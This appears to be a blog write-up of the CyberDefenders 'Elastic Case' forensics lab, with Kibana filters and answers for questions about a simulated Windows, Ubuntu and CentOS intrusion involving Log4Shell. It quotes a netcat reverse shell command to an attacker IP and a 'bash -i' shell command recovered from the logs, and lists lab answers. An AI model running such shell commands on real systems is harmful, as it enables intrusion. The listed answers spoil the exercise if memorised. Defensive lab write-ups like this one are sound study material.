Cyberdefenders ELASTIC CASE write up

Orhan Öztaş
5 min readJun 4, 2022

--

Cyberdefenders is a big opportunity for cyber security analysts. Platform has a very different rooms for investigate for cyber crimes. One of them is the elastic case room in which it gives you a server with an Elk stack deployed.

Let’s deep dive into the ELK stack !!

We will download c71-ElasticSecurity.zip file and extract. When the virtual box is open, we double-click on the ova file that comes out of it and our machine is ready.

Zip Password: cyberdefenders.org

SHA1: 0eda6605d309486110f012bc8dc73e4652059b04

Access Kibana interface via http://127.0.0.1:5601.

username: elastic

password:elastic

#1 Who downloads the malicious file which has a double extension?

We can see malicious file alerts at Observability>Security>Overwiev field. Double extension file looks like orhan.xml.exe

Use this pattern for search the double extension file

filename *.*.*

  • Answer: ahmed

#2 What is the hostname he was using?

Same field show us hostname

  • Answer: DESKTOP-Q1SL9P2

#3 What is the name of the malicious file?

Also same field include a filename answer.

  • Answer: Account_details.pdf.exe

#4 What is the attacker’s IP address?

  • Answer: 192.168.1.10

#5 Another user with high privilege runs the same malicious file. What is the username?

The other username appeared on our previous screen.

  • Answer: cybery

#6 The attacker was able to upload a DLL file of size 8704. What is the file name?

We will use file.name: 8704 filter for answer.

  • Answer: mCblHDgWP.dll

#7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

  • Answer: rundll32.exe

#8 The previous process was able to access a registry. What is the full path of the registry?

In kibana logs index search use process.pid : 8856 then extract registry.path field from selected fields.

  • Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

#9 PowerShell process with pid 8836 changed a file in the system. What was that filename?

we will use

Filter: process.name: “powershell.exe” and process.pid : 8836 filters.

  • Answer: ModuleAnalysisCache

#10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

Filter: process.pid: 11676 and file.extension : ps1

  • Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

#11 What is the machine’s IP address that is in the same LAN as a windows machine?

Machine Ip is 192.168.10.10

Filter: host.ip: 192.168.10.0/24 and NOT host.ip: 192.168.10.10

  • Answer: 192.168.10.30

#12 The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

Check Security>Hosts>ubuntu>Authentications

  • Answer: salem

#13 After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

Filter: hostname: “ubuntu” and process.args: “wget” and username: “salem”

#14 After The attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?

Filter: host.name: “ubuntu” and process.executable :*pkexec and event.action: “uid_change”

  • Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

#15 Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

Filter: host.name: “ubuntu” and process.pid: 3011

bash -i

#16 What is the hostname which alert signal.rule.name: “Netcat Network Activity”?

Filter: signal.rule.name: “Netcat Network Activity”

  • Answer: CentOS

#17 What is the username who ran netcat?

Filter: process.args : “nc” and event.action : exec

  • Answer: solr

#18 What is the parent process name of netcat?

Filter: process.args : “nc” and event.action : exec

  • Answer: java

#19 If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

Filter: process.args : “nc” and event.action : exec

  • Answer: nc -e /bin/bash 192.168.1.10 9999

#20 From the previous three questions, you may remember a famous java vulnerability. What is it?

Ez

  • Answer: Log4Shell

#21 What is the entire log file path of the “solr” application?

Filter: log.file.path : *solr*

  • Answer: /var/solr/logs/solr.log

#22 What is the path that is vulnerable to log4j?

Filter: log.file.path : *solr*

Answer: /admin/cores

#23 What is the GET request parameter used to deliver log4j payload?

Filter: log.file.path : *solr*

Answer: foo

#24 What is the JNDI payload that is connected to the LDAP port?

Filter: log.file.path : “/var/solr/logs/solr.log” and message: *jndi*

--

--

Orhan Öztaş

Cyber Security Consultant. Writing articles for helping you about cyber security.